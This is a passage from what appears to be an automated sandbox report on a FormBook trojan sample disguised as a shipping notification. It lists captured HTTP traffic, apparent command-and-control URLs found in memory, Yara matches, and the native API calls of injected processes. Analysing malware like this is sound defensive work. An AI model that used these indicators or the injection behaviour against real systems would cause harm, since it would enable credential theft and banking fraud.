URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 04:36:49 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 04:36:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: CaddyDate: Fri, 27 Sep 2024 04:37:11 GMTContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: CaddyDate: Fri, 27 Sep 2024 04:37:13 GMTContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: CaddyDate: Fri, 27 Sep 2024 04:37:17 GMTContent-Length: 0Connection: close

Source: sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.antura.partners/px.js?ch=1
Source: sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.antura.partners/px.js?ch=2
Source: sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.antura.partners/sk-logabpstatus.php?a=K3ZvUk8rMHZ6cWJBTjJIV04zS2R2RnBlczJZWldicnJFSmlpMmp
Source: AVyNLNHPrma.exe, 0000000C.00000002.3146774474.0000000005370000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.exhibitarrange.shop
Source: AVyNLNHPrma.exe, 0000000C.00000002.3146774474.0000000005370000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.exhibitarrange.shop/yxqi/
Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_a
Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2#b
Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sort.exe, 0000000B.00000003.1796990827.0000000008175000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: shipping notification_pdf.exe

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0042C0E3 NtClose,	8_2_0042C0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036735C0 NtCreateMutant,LdrInitializeThunk,	8_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672B60 NtClose,LdrInitializeThunk,	8_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03674340 NtSetContextThread,	8_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03673010 NtOpenDirectoryObject,	8_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03673090 NtSetValueKey,	8_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03674650 NtSuspendThread,	8_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672BE0 NtQueryValueKey,	8_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672BF0 NtAllocateVirtualMemory,	8_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672BA0 NtEnumerateValueKey,	8_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672B80 NtQueryInformationFile,	8_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672AF0 NtWriteFile,	8_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672AD0 NtReadFile,	8_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672AB0 NtWaitForSingleObject,	8_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036739B0 NtGetContextThread,	8_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672F60 NtCreateProcessEx,	8_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672F30 NtCreateSection,	8_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672FE0 NtCreateFile,	8_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672FA0 NtQuerySection,	8_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672FB0 NtResumeThread,	8_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672F90 NtProtectVirtualMemory,	8_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672E30 NtWriteVirtualMemory,	8_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672EE0 NtQueueApcThread,	8_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672EA0 NtAdjustPrivilegesToken,	8_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672E80 NtReadVirtualMemory,	8_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03673D70 NtOpenThread,	8_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672D30 NtUnmapViewOfSection,	8_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672D00 NtSetInformationFile,	8_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672D10 NtMapViewOfSection,	8_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03673D10 NtOpenProcessToken,	8_2_03673D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672DD0 NtDelayExecution,	8_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672DB0 NtEnumerateKey,	8_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672C60 NtCreateKey,	8_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672C00 NtQueryInformationProcess,	8_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672CF0 NtOpenProcess,	8_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672CC0 NtQueryVirtualMemory,	8_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03672CA0 NtQueryInformationToken,	8_2_03672CA0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03934340 NtSetContextThread,LdrInitializeThunk,	11_2_03934340
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03934650 NtSuspendThread,LdrInitializeThunk,	11_2_03934650
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039335C0 NtCreateMutant,LdrInitializeThunk,	11_2_039335C0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932BA0 NtEnumerateValueKey,LdrInitializeThunk,	11_2_03932BA0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_03932BF0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932BE0 NtQueryValueKey,LdrInitializeThunk,	11_2_03932BE0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932B60 NtClose,LdrInitializeThunk,	11_2_03932B60
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932AD0 NtReadFile,LdrInitializeThunk,	11_2_03932AD0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932AF0 NtWriteFile,LdrInitializeThunk,	11_2_03932AF0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_039339B0 NtGetContextThread,LdrInitializeThunk,	11_2_039339B0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932FB0 NtResumeThread,LdrInitializeThunk,	11_2_03932FB0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932FE0 NtCreateFile,LdrInitializeThunk,	11_2_03932FE0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932F30 NtCreateSection,LdrInitializeThunk,	11_2_03932F30
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932E80 NtReadVirtualMemory,LdrInitializeThunk,	11_2_03932E80
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_03932EE0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932DD0 NtDelayExecution,LdrInitializeThunk,	11_2_03932DD0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_03932DF0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_03932D10
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_03932D30
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_03932CA0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_03932C70
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932C60 NtCreateKey,LdrInitializeThunk,	11_2_03932C60
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03933090 NtSetValueKey,	11_2_03933090
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03933010 NtOpenDirectoryObject,	11_2_03933010
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932B80 NtQueryInformationFile,	11_2_03932B80
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932AB0 NtWaitForSingleObject,	11_2_03932AB0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932F90 NtProtectVirtualMemory,	11_2_03932F90
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932FA0 NtQuerySection,	11_2_03932FA0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932F60 NtCreateProcessEx,	11_2_03932F60
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932EA0 NtAdjustPrivilegesToken,	11_2_03932EA0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932E30 NtWriteVirtualMemory,	11_2_03932E30
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932DB0 NtEnumerateKey,	11_2_03932DB0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03933D10 NtOpenProcessToken,	11_2_03933D10
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932D00 NtSetInformationFile,	11_2_03932D00
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03933D70 NtOpenThread,	11_2_03933D70
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932CC0 NtQueryVirtualMemory,	11_2_03932CC0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932CF0 NtOpenProcess,	11_2_03932CF0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_03932C00 NtQueryInformationProcess,	11_2_03932C00
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F98AF0 NtCreateFile,	11_2_02F98AF0
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F98E00 NtClose,	11_2_02F98E00
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F98F70 NtAllocateVirtualMemory,	11_2_02F98F70
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F98C60 NtReadFile,	11_2_02F98C60
Source: C:\Windows\SysWOW64\sort.exe	Code function: 11_2_02F98D50 NtDeleteFile,	11_2_02F98D50

Detected potential crypto function

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004180D3	8_2_004180D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00403060	8_2_00403060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040F943	8_2_0040F943
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040F93D	8_2_0040F93D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004162C3	8_2_004162C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004162BE	8_2_004162BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040FB63	8_2_0040FB63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040DBDC	8_2_0040DBDC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040DBE3	8_2_0040DBE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00402500	8_2_00402500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0042E753	8_2_0042E753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040277C	8_2_0040277C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00402780	8_2_00402780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0362D34C	8_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FA352	8_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F132D	8_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0364E3F0	8_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_037003E6	8_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0368739A	8_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036E0274	8_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036E12ED	8_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0365B2C0	8_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036452A0	8_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0367516C	8_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0362F172	8_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0370B16B	8_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03630100	8_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036DA118	8_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F81CC	8_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0364B1B0	8_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_037001AA	8_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F70E9	8_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FF0E0	8_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036EF0CC	8_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036470C0	8_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03640770	8_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03664750	8_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0363C7C0	8_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FF7B0	8_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0365C6E0	8_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F16CC	8_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F7571	8_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03640535	8_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036DD5B0	8_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03700591	8_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03631460	8_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F2446	8_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FF43F	8_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036EE4F6	8_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FFB76	8_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FAB40	8_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0367DBF9	8_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F6BD7	8_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0365FB80	8_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036B3A6C	8_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036FFA49	8_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036F7A46	8_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036EDAC6	8_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_036DDAAC	8_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03685AA0	8_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0363EA80	8_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_03656962	8_2_03656962
